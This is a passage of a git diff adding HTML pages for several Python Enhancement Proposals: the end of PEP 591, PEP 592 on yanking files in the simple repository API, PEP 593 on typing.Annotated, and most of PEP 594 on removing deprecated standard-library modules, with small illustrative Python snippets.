+

Rejected/deferred Ideas

+

The name Const was also considered as the name for the Final +type annotation. The name Final was chosen instead because the +concepts are related and it seemed best to be consistent between them.

+

We considered using a single name Final instead of introducing +final as well, but @Final just looked too weird to us.

+

A related feature to final classes would be Scala-style sealed +classes, where a class is allowed to be inherited only by classes +defined in the same module. Sealed classes seem most useful in +combination with pattern matching, so it does not seem to justify the +complexity in our case. This could be revisited in the future.

+

It would be possible to have the @final decorator on classes +dynamically prevent subclassing at runtime. Nothing else in typing +does any runtime enforcement, though, so final will not either. +A workaround for when both runtime enforcement and static checking is +desired is to use this idiom (possibly in a support module):

+
if typing.TYPE_CHECKING:
+    from typing import final
+else:
+    from runtime_final import final
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0591.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0592/index.html b/pep-0592/index.html new file mode 100644 index 00000000000..c46f64585e3 --- /dev/null +++ b/pep-0592/index.html @@ -0,0 +1,310 @@ + + PEP 592 – Adding “Yank” Support to the Simple API | peps.python.org + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 592 – Adding “Yank” Support to the Simple API

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
BDFL-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
07-May-2019
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding the ability to mark a particular file download +on a simple repository as “yanked”. Yanking a file allows authors to +effectively delete a file, without breaking things for people who have +pinned to exactly a specific version.

+

It also changes the canonical source for the simple repository API to +the Simple Repository API reference document.

+
+
+

Motivation

+

Whenever a project detects that a particular release on PyPI might be +broken, they oftentimes will want to prevent further users from +inadvertently using that version. However, the obvious solution of +deleting the existing file from a repository will break users who have +followed best practices and pinned to a specific version of the project.

+

This leaves projects in a catch-22 situation where new projects may be +pulling down this known broken version, but if they do anything to +prevent that they’ll break projects that are already using it.

+

By allowing the ability to “yank” a file, but still make it available +for users who are explicitly asking for it, this allows projects to +mitigate the worst of the breakage while still keeping things working +for projects who have otherwise worked around or didn’t hit the +underlying issues.

+

One of the main scenarios where this may happen, is when dropping +support for a particular version of Python. The python-requires +metadata allows for dropping support for a version of Python in +a way that is not disruptive to users who are still using that +Python. However, a common mistake is to either omit or forget to +update that bit of metadata. When that mistake has been made, a +project really only has three options:

+
    +
  • Prevent that version from being installed through some mechanism +(currently, the only mechanism is by deleting the release entirely).
  • +
  • Re-release the version that worked as a higher version number, and +then re-release the version that dropped support as an even higher +version number with the correct metadata.
  • +
  • Do nothing, and document that people using that older Python have +to manually exclude that release.
  • +
+

With this PEP, projects can choose the first option, but with a +mechanism that is less likely to break the world for people who +are currently successfully using said project.

+
+
+

Specification

+

Links in the simple repository MAY have a data-yanked attribute +which may have no value, or may have an arbitrary string as a value. The +presence of a data-yanked attribute SHOULD be interpreted as +indicating that the file pointed to by this particular link has been +“Yanked”, and should not generally be selected by an installer, except +under specific scenarios.

+

The value of the data-yanked attribute, if present, is an arbitrary +string that represents the reason for why the file has been yanked. Tools +that process the simple repository API MAY surface this string to +end users.

+

The yanked attribute is not immutable once set, and may be rescinded in +the future (and once rescinded, may be reset as well). Thus API users +MUST be able to cope with a yanked file being “unyanked” (and even +yanked again).
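 
+
 
A minimal sketch of how a consumer might detect the attribute using only the standard library (the HTML fragment and the YankScanner name are illustrative, not part of the specification):
 
+
from html.parser import HTMLParser
+
+class YankScanner(HTMLParser):
+    """Record which file links on a simple-API page carry data-yanked."""
+    def __init__(self):
+        super().__init__()
+        self.yanked = {}  # href -> reason ('' when the attribute has no value)
+
+    def handle_starttag(self, tag, attrs):
+        d = dict(attrs)
+        if tag == 'a' and 'data-yanked' in d:
+            self.yanked[d.get('href', '')] = d['data-yanked'] or ''
+
+scanner = YankScanner()
+scanner.feed('<a href="pkg-1.0.tar.gz" data-yanked="broken">pkg-1.0.tar.gz</a>')
+print(scanner.yanked)  # {'pkg-1.0.tar.gz': 'broken'}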

+
+

Installers

+

The desirable experience is that, once a file is yanked, a human who +is directly trying to install that yanked file sees the attempt fail, +as if the file had been deleted. However, when a human did that a +while ago, and a computer is now just mechanically following the +original order to install the now yanked file, it acts as if the file +had not been yanked.

+

An installer MUST ignore yanked releases, if the selection constraints +can be satisfied with a non-yanked version, and MAY refuse to use a +yanked release even if it means that the request cannot be satisfied at all. +An implementation SHOULD choose a policy that follows the spirit of the +intention above, and that prevents “new” dependencies on yanked +releases/files.

+

What this means is left up to the specific installer, to decide how to best +fit into the overall usage of their installer. However, there are two +suggested approaches to take:

+
    +
  1. Yanked files are always ignored, unless they are the only file that +matches a version specifier that “pins” to an exact version using +either == (without any modifiers that make it a range, such as +.*) or ===. Matching this version specifier should otherwise +be done as per PEP 440 for things like local versions, zero padding, +etc. (see the sketch after this list).
  2. +
  3. Yanked files are always ignored, unless they are the only file that +matches what a lock file (such as Pipfile.lock or poetry.lock) +specifies to be installed. In this case, a yanked file SHOULD not +be used when creating or updating a lock file from some input file or +command.
  4. +
+
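 
To make the first suggested approach concrete, here is a minimal runnable sketch (the Candidate class and the exact_pin flag are hypothetical illustrations, not any installer's actual API):
 
+
from dataclasses import dataclass
+
+@dataclass
+class Candidate:
+    version: str
+    yanked: bool  # True when the file's link carries data-yanked
+
+def select(candidates, matching_versions, exact_pin):
+    matching = [c for c in candidates if c.version in matching_versions]
+    unyanked = [c for c in matching if not c.yanked]
+    if unyanked:
+        return unyanked                   # prefer non-yanked files
+    return matching if exact_pin else []  # yanked only for '=='/'===' pins
+
+files = [Candidate('1.0', True), Candidate('1.1', False)]
+assert [c.version for c in select(files, {'1.0', '1.1'}, False)] == ['1.1']
+assert [c.version for c in select(files, {'1.0'}, True)] == ['1.0']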

Regardless of the specific strategy that an installer chooses for deciding +when to install yanked files, an installer SHOULD emit a warning when +it does decide to install a yanked file. That warning MAY utilize the +value of the data-yanked attribute (if it has a value) to provide more +specific feedback to the user about why that file had been yanked.

+
+
+

Mirrors

+

Mirrors can generally treat yanked files one of two ways:

+
    +
  1. They may choose to omit them from their simple repository API completely, +providing a view over the repository that shows only “active”, unyanked +files.
  2. +
  3. They may choose to include yanked files, and additionally mirror the +data-yanked attribute as well.
  4. +
+

Mirrors MUST NOT mirror a yanked file without also mirroring the +data-yanked attribute for it.

+
+
+
+

Rejected Ideas

+

A previous, undocumented, version of the simple repository API had +version specific pages, like /simple/<project>/<version>/. If +we were to add those back, the yanked files could only appear on +those pages and not on the version-less page at all. However this +would drastically reduce the cache-ability of the simple API and +would directly impact our ability to scale it out to handle all of +the incoming traffic.

+

A previous iteration of this PEP had the data-yanked attribute +act as a boolean value. However it was decided that allowing a +string both simplified the implementation, and provided additional +generalized functionality to allow projects to provide a mechanism +to indicate why they were yanking a release.

+

Another suggestion was to reserve some syntax in the arbitrary string +to allow us to evolve the standard in the future if we ever need to. +However, given we can add additional attributes in the future, this +idea has been rejected, favoring instead to use additional attributes +if the need ever arose.

+
+
+

Warehouse/PyPI Implementation Notes

+

While this PEP implements yanking at the file level, that is largely +due to the shape the simple repository API takes, not a specific +decision made by this PEP.

+

In Warehouse, the user experience will be implemented in terms of +yanking or unyanking an entire release, rather than as an operation on +individual files, which will then be exposed via the API as individual +files being yanked.

+

Other repository implementations may choose to expose this capability +in a different way, or not expose it at all.

+
+

Journal Handling

+

Whenever a release has been yanked, an entry will be recorded in the +journal using one of the following string patterns:

+
    +
  • yank release
  • +
  • unyank release
  • +
+

In both cases, the standard journal structure will indicate which release +of which project has been yanked or unyanked.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0592.rst

+

Last modified: 2024-06-18 17:55:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0593/index.html b/pep-0593/index.html new file mode 100644 index 00000000000..330279bffe0 --- /dev/null +++ b/pep-0593/index.html @@ -0,0 +1,401 @@ + + PEP 593 – Flexible function and variable annotations | peps.python.org + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 593 – Flexible function and variable annotations

+
+
Author:
+
Till Varoquaux <till at fb.com>, Konstantin Kashin <kkashin at fb.com>
+
Sponsor:
+
Ivan Levkivskyi <levkivskyi at gmail.com>
+
Discussions-To:
+
Typing-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
26-Apr-2019
+
Python-Version:
+
3.9
+
Post-History:
+
20-May-2019
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see Annotated and +typing.Annotated for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+


+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

This PEP introduces a mechanism to extend the type annotations from PEP +484 with arbitrary metadata.

+
+
+

Motivation

+

PEP 484 provides standard semantics for the annotations introduced in PEP 3107. Although PEP 484 is prescriptive, it is the de facto standard for most consumers of annotations; in many statically checked code bases, where type annotations are widely used, they have effectively crowded out any other form of annotation. Some of the use cases for annotations described in PEP 3107 (database mapping, foreign-language bridges) are not currently realistic given the prevalence of type annotations. Furthermore, the standardisation of type annotations rules out advanced features only supported by specific type checkers.

+
+
+

Rationale

+

This PEP adds an Annotated type to the typing module to decorate +existing types with context-specific metadata. Specifically, a type +T can be annotated with metadata x via the typehint +Annotated[T, x]. This metadata can be used for either static +analysis or at runtime. If a library (or tool) encounters a typehint +Annotated[T, x] and has no special logic for metadata x, it +should ignore it and simply treat the type as T. Unlike the +no_type_check functionality that currently exists in the typing +module which completely disables typechecking annotations on a function +or a class, the Annotated type allows for both static typechecking +of T (e.g., via mypy or Pyre, +which can safely ignore x) +together with runtime access to x within a specific application. The +introduction of this type would address a diverse set of use cases of interest +to the broader Python community.

+

This was originally brought up as issue 600 in the typing GitHub repository and then discussed on python-ideas.

+
+
+

Motivating examples

+
+

Combining runtime and static uses of annotations

+

There’s an emerging trend of libraries leveraging the typing annotations at +runtime (e.g.: dataclasses); having the ability to extend the typing annotations +with external data would be a great boon for those libraries.

+

Here’s an example of how a hypothetical module could leverage annotations to +read c structs:

+
UnsignedShort = Annotated[int, struct2.ctype('H')]
+SignedChar = Annotated[int, struct2.ctype('b')]
+
+class Student(struct2.Packed):
+    # mypy typechecks 'name' field as 'str'
+    name: Annotated[str, struct2.ctype("<10s")]
+    serialnum: UnsignedShort
+    school: SignedChar
+
+# 'unpack' only uses the metadata within the type annotations
+Student.unpack(record)
+# Student(name=b'raymond   ', serialnum=4658, school=264)
+
+
+
+
+

Lowering barriers to developing new typing constructs

+

Typically, when adding a new type, a developer needs to upstream that type to the typing module and change mypy, PyCharm, Pyre, pytype, etc. This is particularly important when working on open-source code that makes use of these types, since the code would not be immediately transportable to other developers’ tools without additional logic. As a result, there is a high cost to developing and trying out new types in a codebase. Ideally, authors should be able to introduce new types in a manner that allows for graceful degradation (e.g. when clients do not have a custom mypy plugin), which would lower the barrier to development and ensure some degree of backward compatibility.

+

For example, suppose that an author wanted to add support for tagged unions to Python. One way to accomplish this would be to annotate TypedDict in Python such that only one field is allowed to be set:

+
Currency = Annotated[
+    TypedDict('Currency', {'dollars': float, 'pounds': float}, total=False),
+    TaggedUnion,
+]
+
+
+

This is a somewhat cumbersome syntax but it allows us to iterate on this +proof-of-concept and have people with type checkers (or other tools) that don’t +yet support this feature work in a codebase with tagged unions. The author could +easily test this proposal and iron out the kinks before trying to upstream tagged +union to typing, mypy, etc. Moreover, tools that do not have support for +parsing the TaggedUnion annotation would still be able to treat Currency +as a TypedDict, which is still a close approximation (slightly less strict).

+
+
+
+

Specification

+
+

Syntax

+

Annotated is parameterized with a type and an arbitrary list of +Python values that represent the annotations. Here are the specific +details of the syntax:

+
    +
  • The first argument to Annotated must be a valid type
  • +
  • Multiple type annotations are supported (Annotated supports variadic +arguments):
    Annotated[int, ValueRange(3, 10), ctype("char")]
    +
    +
    +
  • +
  • Annotated must be called with at least two arguments ( +Annotated[int] is not valid)
  • +
  • The order of the annotations is preserved and matters for equality +checks:
    Annotated[int, ValueRange(3, 10), ctype("char")] != Annotated[
    +    int, ctype("char"), ValueRange(3, 10)
    +]
    +
    +
    +
  • +
  • Nested Annotated types are flattened, with metadata ordered +starting with the innermost annotation:
    Annotated[Annotated[int, ValueRange(3, 10)], ctype("char")] == Annotated[
    +    int, ValueRange(3, 10), ctype("char")
    +]
    +
    +
    +
  • +
  • Duplicated annotations are not removed:
    Annotated[int, ValueRange(3, 10)] != Annotated[
    +    int, ValueRange(3, 10), ValueRange(3, 10)
    +]
    +
    +
    +
  • +
  • Annotated can be used with nested and generic aliases:
T = TypeVar('T')
    +Vec = Annotated[List[Tuple[T, T]], MaxLen(10)]
    +V = Vec[int]
    +
    +V == Annotated[List[Tuple[int, int]], MaxLen(10)]
    +
    +
    +
  • +
+
+
+

Consuming annotations

+

Ultimately, the responsibility of how to interpret the annotations (if +at all) is the responsibility of the tool or library encountering the +Annotated type. A tool or library encountering an Annotated type +can scan through the annotations to determine if they are of interest +(e.g., using isinstance()).
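For illustration, here is a hedged sketch (assuming Python 3.9+) of such a scan, reusing the hypothetical ValueRange annotation from the examples above:

from typing import Annotated, get_args, get_origin, get_type_hints

class ValueRange:  # hypothetical annotation class, as in the examples above
    def __init__(self, lo, hi):
        self.lo, self.hi = lo, hi

def clamp(x: Annotated[int, ValueRange(0, 255)]) -> int:
    return max(0, min(255, x))

def value_ranges(func):
    """Collect ValueRange metadata for each Annotated parameter of func."""
    found = {}
    for name, hint in get_type_hints(func, include_extras=True).items():
        if get_origin(hint) is Annotated:
            _base, *metadata = get_args(hint)
            found[name] = [m for m in metadata if isinstance(m, ValueRange)]
    return found

# value_ranges(clamp) -> {'x': [the ValueRange(0, 255) instance]}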

+

Unknown annotations: When a tool or a library does not support annotations or encounters an unknown annotation, it should just ignore it and treat the annotated type as the underlying type. For example, when encountering an annotation that is not an instance of struct2.ctype in the annotations for name (e.g., Annotated[str, 'foo', struct2.ctype("<10s")]), the unpack method should ignore it.

+

Namespacing annotations: Namespaces are not needed for annotations since +the class used by the annotations acts as a namespace.

+

Multiple annotations: It’s up to the tool consuming the annotations +to decide whether the client is allowed to have several annotations on +one type and how to merge those annotations.

+

Since the Annotated type allows you to put several annotations of +the same (or different) type(s) on any node, the tools or libraries +consuming those annotations are in charge of dealing with potential +duplicates. For example, if you are doing value range analysis you might +allow this:

+
T1 = Annotated[int, ValueRange(-10, 5)]
+T2 = Annotated[T1, ValueRange(-20, 3)]
+
+
+

Flattening nested annotations, this translates to:

+
T2 = Annotated[int, ValueRange(-10, 5), ValueRange(-20, 3)]
+
+
+
+
+

Interaction with get_type_hints()

+

typing.get_type_hints() will take a new argument include_extras that +defaults to False to preserve backward compatibility. When +include_extras is False, the extra annotations will be stripped +out of the returned value. Otherwise, the annotations will be returned +unchanged:

+
@struct2.packed
+class Student(NamedTuple):
+    name: Annotated[str, struct2.ctype("<10s")]
+
+get_type_hints(Student) == {'name': str}
+get_type_hints(Student, include_extras=False) == {'name': str}
+get_type_hints(Student, include_extras=True) == {
+    'name': Annotated[str, struct2.ctype("<10s")]
+}
+
+
+
+
+

Aliases & Concerns over verbosity

+

Writing typing.Annotated everywhere can be quite verbose; +fortunately, the ability to alias annotations means that in practice we +don’t expect clients to have to write lots of boilerplate code:

+
T = TypeVar('T')
+Const = Annotated[T, my_annotations.CONST]
+
+class C:
+    def const_method(self: Const[List[int]]) -> int:
+        ...
+
+
+
+
+
+

Rejected ideas

+

Some of the proposed ideas were rejected from this PEP because they would +cause Annotated to not integrate cleanly with the other typing annotations:

+
    +
  • Annotated cannot infer the decorated type. You could imagine that +Annotated[..., Immutable] could be used to mark a value as immutable +while still inferring its type. Typing does not support using the +inferred type anywhere else; it’s best to not add this as a +special case.
  • +
  • Using (Type, Ann1, Ann2, ...) instead of Annotated[Type, Ann1, Ann2, ...]. This would cause confusion when annotations appear in nested positions (Callable[[A, B], C] is too similar to Callable[[(A, B)], C]) and would make it impossible for constructors to be passthrough (T(5) == C(5) when C = Annotated[T, Ann]).
  • +
+

This feature was left out to keep the design simple:

+
    +
  • Annotated cannot be called with a single argument. Annotated could support +returning the underlying value when called with a single argument (e.g.: +Annotated[int] == int). This complicates the specifications and adds +little benefit.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0593.rst

+

Last modified: 2024-06-11 22:12:09 GMT

diff --git a/pep-0594/index.html b/pep-0594/index.html
new file mode 100644
index 00000000000..08c195186c7
--- /dev/null
+++ b/pep-0594/index.html
@@ -0,0 +1,1022 @@

PEP 594 – Removing dead batteries from the standard library | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 594 – Removing dead batteries from the standard library

+
+
Author:
+
Christian Heimes <christian at python.org>, +Brett Cannon <brett at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
20-May-2019
+
Python-Version:
+
3.11
+
Post-History:
+
21-May-2019, 04-Feb-2022
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposed a list of standard library modules to be removed from the +standard library. The modules are mostly historic data formats (e.g. Commodore +and SUN file formats), APIs and operating systems that have been superseded a +long time ago (e.g. Mac OS 9), or modules that have security implications and +better alternatives (e.g. password and login).

+

The PEP follows in the footsteps of other PEPs like PEP 3108. The Standard Library Reorganization proposal removed a bunch of modules from Python 3.0. In 2007, the PEP referred to maintenance burden as:

+
+
“Over the years, certain modules have become a heavy burden upon python-dev +to maintain. In situations like this, it is better for the module to be +given to the community to maintain to free python-dev to focus more on +language support and other modules in the standard library that do not take +up an undue amount of time and effort.”
+

The withdrawn PEP 206 from 2000 expresses issues with the Python standard +library in an unvarnished and forthright manner:

+
+
“[…] the standard library modules aren’t always the best choices for a +job. Some library modules were quick hacks (e.g. calendar, +commands), some were designed poorly and are now near-impossible to +fix (cgi), and some have been rendered obsolete by other, more complete +modules […].”
+
+
+

Rationale

+

Back in the early days of Python, the interpreter came with a large set of +useful modules. This was often referred to as “batteries included” +philosophy and was one of the cornerstones to Python’s success story. +Users didn’t have to figure out how to download and install separate +packages in order to write a simple web server or parse email.

+

Times have changed. With the introduction of PyPI (née Cheeseshop), setuptools, +and later pip, it became simple and straightforward to download and install +packages. Nowadays Python has a rich and vibrant ecosystem of third-party +packages. It’s pretty much standard to either install packages from PyPI or +use one of the many Python or Linux distributions.

+

On the other hand, Python’s standard library is piling up with cruft, unnecessary +duplication of functionality, and dispensable features. This is undesirable +for several reasons.

+
    +
  • Any additional module increases the maintenance cost for the Python core development team. The team has limited resources; reduced maintenance cost frees development time for other improvements.
  • +
  • Modules in the standard library are generally favored and seen as the de facto solution for a problem. A majority of users only pick third-party modules to replace a stdlib module when they have a compelling reason, e.g. lxml instead of xml. The removal of an unmaintained stdlib module increases the chances of a community-contributed module becoming widely used.
  • +
  • A lean and mean standard library benefits platforms with limited resources like devices with just a few hundred kilobytes of storage (e.g. BBC Micro:bit). Python on mobile platforms like BeeWare or WebAssembly (e.g. pyodide) also benefits from reduced download size.
  • +
+

The modules in this PEP have been selected for deprecation because their +removal is either least controversial or most beneficial. For example, +least controversial are 30-year-old multimedia formats like the sunau +audio format, which was used on SPARC and NeXT workstations in the late +1980s. The crypt module has fundamental flaws that are better solved +outside the standard library.

+

This PEP also designates some modules as not scheduled for removal. Some modules have been deprecated for several releases or seem unnecessary at first glance. However, it is beneficial to keep the modules in the standard library, mostly for environments where installing a package from PyPI is not an option. Examples include corporate environments or classrooms where external code is not permitted without legal approval.

+
    +
  • The usage of FTP is declining, but some files are still provided over FTP, and some hosting providers offer FTP for uploading content. Therefore, ftplib is going to stay.
  • +
  • The optparse and getopt modules are widely used. They are mature +modules with very low maintenance overhead.
  • +
  • According to David Beazley [5] the wave module is easy to teach to +kids and can make crazy sounds. Making a computer generate sounds is a +powerful and highly motivating exercise for a nine-year-old aspiring developer. +It’s a fun battery to keep.
  • +
+
+
+

Deprecation schedule

+
+

3.11

+

Starting with Python 3.11, deprecated modules will start issuing +DeprecationWarning. The estimated EOL of Python 3.10, the last +version without the warning, is October 2026.

+
+
+

3.12

+

There should be no specific change compared to Python 3.11. +This is the last version of Python with the deprecated modules, +with an estimated EOL of October 2028.

+
+
+

3.13

+

All modules deprecated by this PEP are removed from the main branch +of the CPython repository and are no longer distributed as part of Python.

+
+
+
+

Deprecated modules

+

The modules are grouped as data encoding, multimedia, network, OS interface, +and misc modules. The majority of modules are for old data formats or +old APIs. Some others are rarely useful and have better replacements on +PyPI, e.g. Pillow for image processing or NumPy-based projects to deal with +audio processing.

Table 1: Proposed modules deprecations

Module      | Deprecated in | To be removed | Added in  | Has maintainer? | Replacement
------------|---------------|---------------|-----------|-----------------|------------
aifc        | 3.11 (3.0*)   | 3.13          | 1993      | yes (inactive)  | -
asynchat    | 3.6 (3.0*)    | 3.12          | 1999      | yes             | asyncio
asyncore    | 3.6 (3.0*)    | 3.12          | 1999      | yes             | asyncio
audioop     | 3.11 (3.0*)   | 3.13          | 1992      | yes             | -
cgi         | 3.11 (2.0**)  | 3.13          | 1995      | no              | -
cgitb       | 3.11 (2.0**)  | 3.13          | 1995      | no              | -
chunk       | 3.11          | 3.13          | 1999      | no              | -
crypt       | 3.11          | 3.13          | 1994      | yes (inactive)  | legacycrypt, bcrypt, argon2-cffi, hashlib, passlib
imghdr      | 3.11          | 3.13          | 1992      | no              | filetype, puremagic, python-magic
mailcap     | 3.11          | 3.13          | 1995      | no              | -
msilib      | 3.11          | 3.13          | 2006      | no              | -
nntplib     | 3.11          | 3.13          | 1992      | no              | -
nis         | 3.11 (3.0*)   | 3.13          | 1992      | no              | -
ossaudiodev | 3.11          | 3.13          | 2002      | no              | -
pipes       | 3.11          | 3.13          | 1992      | no              | subprocess
smtpd       | 3.4.7, 3.5.4  | 3.12          | 2001      | yes             | aiosmtpd
sndhdr      | 3.11          | 3.13          | 1994      | no              | filetype, puremagic, python-magic
spwd        | 3.11          | 3.13          | 2005      | no              | python-pam
sunau       | 3.11 (3.0*)   | 3.13          | 1993      | no              | -
telnetlib   | 3.11 (3.0*)   | 3.13          | 1997      | no              | telnetlib3, Exscript
uu          | 3.11          | 3.13          | 1994      | no              | -
xdrlib      | 3.11          | 3.13          | 1992/1996 | no              | -

The deprecations marked (*) and (**) were previously proposed by PEP 3108 for 3.0 and PEP 206 for 2.0, respectively. The “added in” column illustrates when a module was originally designed and added to the standard library. The “has maintainer” column refers to the expert index, a list of domain experts and maintainers in the DevGuide.

+
+

Data encoding modules

+
+

uu and the uu encoding

+

The uu module provides support for the uuencode format, an old binary encoding format for email from 1980. The uu format has been replaced by MIME. The uu codec is provided by the binascii module. There’s also encodings/uu_codec.py, a codec for the same encoding; it should also be deprecated.

+
+
+

xdrlib

+

The xdrlib module supports +the Sun External Data Representation Standard. XDR is an old binary +serialization format from 1987. These days it’s rarely used outside +specialized domains like NFS.

+
+
+
+

Multimedia modules

+
+

aifc

+

The aifc module provides support for reading and writing AIFF and AIFF-C files. The Audio Interchange File Format is an old audio format from 1988 based on Amiga IFF. It was most commonly used on the Apple Macintosh. These days only a few specialized applications use AIFF.

+

A user disclosed [6] that the post-production film industry makes heavy use of the AIFC file format. The usage of the aifc module in closed-source and internal software was unknown prior to the first posting of this PEP. This may be a compelling argument to keep the aifc module in the standard library. The file format is stable and the module does not require much maintenance. The strategic benefits for Python may outweigh the burden.

+
+
+

audioop

+

The audioop module +contains helper functions to manipulate raw audio data and adaptive +differential pulse-code modulated audio data. The module is implemented in +C without any additional dependencies. The aifc, sunau, and wave +modules depend on audioop for some operations.

+

The byteswap operation in the wave module can be substituted with little +extra work. In case aifc is not deprecated as well, a reduced version of +the audioop module is converted into a private implementation detail, +e.g. _audioop with byteswap, alaw2lin, ulaw2lin, lin2alaw, +lin2ulaw, and lin2adpcm.

+
+
+

chunk

+

The chunk module provides +support for reading and writing Electronic Arts’ Interchange File Format. +IFF is an old audio file format originally introduced for Commodore and +Amiga. The format is no longer relevant.

+
+
+

imghdr

+

The imghdr module is a +simple tool to guess the image file format from the first 32 bytes +of a file or buffer. It supports only a limited number of formats and +neither returns resolution nor color depth.
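As a hedged illustration of what a replacement can look like, a few plain magic-byte checks cover the common cases (the third-party filetype, puremagic, and python-magic packages listed in Table 1 are far more complete):

_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

def guess_image_format(path):
    """Return 'png', 'jpeg', 'gif', or None by sniffing leading magic bytes."""
    with open(path, "rb") as f:
        head = f.read(32)
    for magic, fmt in _SIGNATURES.items():
        if head.startswith(magic):
            return fmt
    return None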

+
+
+

ossaudiodev

+

The ossaudiodev module provides support for Open Sound System, an interface to sound playback and capture devices. OSS was initially free software, but later support for newer sound devices and improvements were proprietary. The Linux community abandoned OSS in favor of ALSA [1]. Some operating systems like OpenBSD and NetBSD provide an incomplete [2] emulation of OSS.

+

To the best of my knowledge, FreeBSD is the only widespread operating system that uses Open Sound System as of today. The ossaudiodev module hasn’t seen any improvements or new features since 2003. All commits since 2003 are project-wide code cleanups and a couple of bug fixes. It would be beneficial for both the FreeBSD community and core development if the module were maintained and distributed by people that care for it and use it.

+

The standard library used to have more audio-related modules. The other +audio device interfaces (audiodev, linuxaudiodev, sunaudiodev) +were removed in 2007 as part of the PEP 3108 stdlib re-organization.

+
+
+

sndhdr

+

The sndhdr module is +similar to the imghdr module but for audio formats. It guesses file +format, channels, frame rate, and sample widths from the first 512 bytes of +a file or buffer. The module only supports AU, AIFF, HCOM, VOC, WAV, and +other ancient formats.

+
+
+

sunau

+

The sunau module provides +support for Sun AU sound format. It’s yet another old, obsolete file format.

+
+
+
+

Networking modules

+
+

asynchat

+

The asynchat module is built on top of +asyncore and has been deprecated since Python 3.6.

+
+
+

asyncore

+

The asyncore module was +the first module for asynchronous socket service clients and servers. It +has been replaced by asyncio and is deprecated since Python 3.6.

+

The asyncore module is also used in stdlib tests. The tests for ftplib, logging, smtpd, smtplib, and ssl are partly based on asyncore. These tests must be updated to use asyncio or threading.

+
+
+

cgi

+

The cgi module is a support module for Common Gateway Interface (CGI) scripts. CGI is deemed inefficient because every incoming request is handled in a new process. PEP 206 considers the module as:

+
+
“[…] designed poorly and are now near-impossible to fix (cgi) […]”
+

Replacements for the various parts of cgi which are not directly +related to executing code are:

+
    +
  • parse with urllib.parse.parse_qs (parse is just a wrapper; see the sketch after this list)
  • +
  • parse_header with email.message.Message (see example below)
  • +
  • parse_multipart with email.message.Message (same MIME RFCs)
  • +
  • FieldStorage/MiniFieldStorage has no direct replacement, but can +typically be replaced by using multipart (for POST and PUT +requests) or urllib.parse.parse_qsl (for GET and HEAD +requests)
  • +
  • valid_boundary (undocumented) with re.compile("^[ -~]{0,200}[!-~]$")
  • +
+
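As a quick, hedged illustration of the first item above, query-string parsing maps directly onto urllib.parse.parse_qs:

>>> from urllib.parse import parse_qs
>>> parse_qs("a=1&a=2&b=3")
{'a': ['1', '2'], 'b': ['3']}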

As an explicit example of how close parse_header and +email.message.Message are:

+
>>> h = 'application/json; charset=utf8'
>>> from cgi import parse_header
+>>> from email.message import Message
+>>> parse_header(h)
+('application/json', {'charset': 'utf8'})
+>>> m = Message()
+>>> m['content-type'] = h
+>>> m.get_params()
+[('application/json', ''), ('charset', 'utf8')]
+>>> m.get_param('charset')
+'utf8'
+
+
+
+
+

cgitb

+

The cgitb module is a +helper for the cgi module for configurable tracebacks.

+

The cgitb module is not used by any major Python web framework (Django, +Pyramid, Plone, Flask, CherryPy, or Bottle). Only Paste uses it in an +optional debugging middleware.

+
+
+

smtpd

+

The smtpd module provides a simple implementation of an SMTP mail server. The module documentation marks the module as deprecated and recommends aiosmtpd instead. The deprecation message was added in releases 3.4.7, 3.5.4, and 3.6.1.

+
+
+

nntplib

+

The nntplib module implements the client side of the Network News Transfer Protocol (NNTP). News groups used to be a dominant platform for online discussions. Over the last two decades, news has been slowly but steadily replaced by mailing lists and web-based discussion platforms. Twisted is also planning to deprecate NNTP support and pynntp hasn’t seen any activity since 2014. This is a good indicator that the public interest in NNTP support is declining.

+

The nntplib tests have been the cause of additional work in the recent +past. Python only contains the client side of NNTP, so the tests connect to +external news servers. The servers are sometimes unavailable, too slow, or do +not work correctly over IPv6. The situation causes flaky test runs on +buildbots.

+
+
+

telnetlib

+

The telnetlib module +provides a Telnet class that implements the Telnet protocol.

+
+
+
+

Operating system interface

+
+

crypt

+

The crypt module implements +password hashing based on the crypt(3) function from libcrypt or +libxcrypt on Unix-like platforms. The algorithms are mostly old, of poor +quality and insecure. Users are discouraged from using them.

+
    +
  • The module is not available on Windows. Cross-platform applications need +an alternative implementation anyway.
  • +
  • Only DES encryption is guaranteed to be available. DES has an extremely +limited key space of 2**56.
  • +
  • MD5, salted SHA256, salted SHA512, and Blowfish are optional extensions. SSHA256 and SSHA512 are glibc extensions. Blowfish (bcrypt) is the only algorithm that is still secure. However, it’s not in glibc and is therefore not commonly available on Linux.
  • +
  • Depending on the platform, the crypt module is not thread safe. Only +implementations with crypt_r(3) are thread safe.
  • +
  • The module was never useful to interact with system user and password +databases. On BSD, macOS, and Linux, all user authentication and +password modification operations must go through PAM (pluggable +authentication module); see the spwd deprecation.
  • +
+
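As a hedged sketch of the hashlib replacement listed in Table 1 (dedicated libraries such as bcrypt, argon2-cffi, or passlib are usually the better choice), password hashing can be done with hashlib.scrypt; the parameter values below are common interactive-login choices, not a recommendation made by this PEP:

import hashlib
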